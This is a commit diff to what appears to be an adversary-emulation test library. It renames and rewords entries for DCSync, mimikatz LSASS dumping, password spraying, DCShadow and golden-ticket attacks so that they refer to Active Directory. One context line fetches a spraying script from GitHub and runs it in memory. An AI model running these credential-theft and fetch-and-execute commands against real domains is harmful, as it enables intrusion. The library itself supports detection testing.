Improve discoverability of "Active Directory" attacks (#1544)
This commit is contained in:
@@ -1,10 +1,10 @@
|
||||
attack_technique: T1003.006
|
||||
display_name: "OS Credential Dumping: DCSync"
|
||||
atomic_tests:
|
||||
- name: DCSync
|
||||
- name: DCSync (Active Directory)
|
||||
auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e
|
||||
description: |
|
||||
Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
|
||||
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
|
||||
Works against a remote Windows Domain Controller using the replication protocol.
|
||||
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
|
||||
[Reference](https://adsecurity.org/?p=1729)
|
||||
@@ -12,7 +12,7 @@ atomic_tests:
|
||||
- windows
|
||||
input_arguments:
|
||||
domain:
|
||||
description: Targeted domain
|
||||
description: Targeted Active Directory domain
|
||||
type: string
|
||||
default: example.com
|
||||
user:
|
||||
|
||||
@@ -34,6 +34,7 @@ atomic_tests:
|
||||
auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
|
||||
description: |
|
||||
Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
|
||||
Especially useful against domain controllers in Active Directory environments.
|
||||
It must be executed in the context of a user who is privileged on remote `machine`.
|
||||
|
||||
The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
attack_technique: T1110.001
|
||||
display_name: 'Brute Force: Password Guessing'
|
||||
atomic_tests:
|
||||
- name: Brute Force Credentials of all domain users via SMB
|
||||
- name: Brute Force Credentials of all Active Directory domain users via SMB
|
||||
auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
|
||||
description: |
|
||||
Creates username and password files then attempts to brute force on remote host
|
||||
Creates username and password files then attempts to brute force Active Directory accounts on remote host
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -21,7 +21,7 @@ atomic_tests:
|
||||
type: String
|
||||
default: '\\COMPANYDC1\IPC$'
|
||||
domain:
|
||||
description: Domain name of the target system we will brute force upon
|
||||
description: Active Directory domain name of the target system we will brute force upon
|
||||
type: String
|
||||
default: YOUR_COMPANY
|
||||
executor:
|
||||
@@ -35,10 +35,10 @@ atomic_tests:
|
||||
cleanup_command: |-
|
||||
del #{input_file_users}
|
||||
del #{input_file_passwords}
|
||||
- name: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
|
||||
- name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)
|
||||
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
|
||||
description: |
|
||||
Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
|
||||
Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -51,7 +51,7 @@ atomic_tests:
|
||||
type: String
|
||||
default: Password1`n1q2w3e4r`nPassword!
|
||||
domain:
|
||||
description: Domain FQDN
|
||||
description: Active Directory domain FQDN
|
||||
type: String
|
||||
default: contoso.com
|
||||
auth:
|
||||
|
||||
@@ -55,10 +55,10 @@ atomic_tests:
|
||||
command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
|
||||
- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
|
||||
- name: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
|
||||
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
|
||||
description: |
|
||||
Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
|
||||
Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
|
||||
|
||||
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
|
||||
supported_platforms:
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
attack_technique: T1207
|
||||
display_name: Rogue Domain Controller
|
||||
atomic_tests:
|
||||
- name: DCShadow - Mimikatz
|
||||
- name: DCShadow (Active Directory)
|
||||
auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
|
||||
description: |
|
||||
Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute.
|
||||
Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute.
|
||||
|
||||
[DCShadow](https://www.dcshadow.com/)
|
||||
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
attack_technique: T1558.001
|
||||
display_name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
|
||||
atomic_tests:
|
||||
- name: Crafting golden tickets with mimikatz
|
||||
- name: Crafting Active Directory golden tickets with mimikatz
|
||||
auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
|
||||
description: |
|
||||
Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain.
|
||||
Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the Active Directory domain.
|
||||
This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769).
|
||||
The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
|
||||
supported_platforms:
|
||||
@@ -15,7 +15,7 @@ atomic_tests:
|
||||
type: string
|
||||
default: S-1-5-21-DEFAULT
|
||||
domain:
|
||||
description: Targeted domain FQDN
|
||||
description: Targeted Active Directory domain FQDN
|
||||
type: string
|
||||
default: example.com
|
||||
account:
|
||||
|
||||
Reference in New Issue
Block a user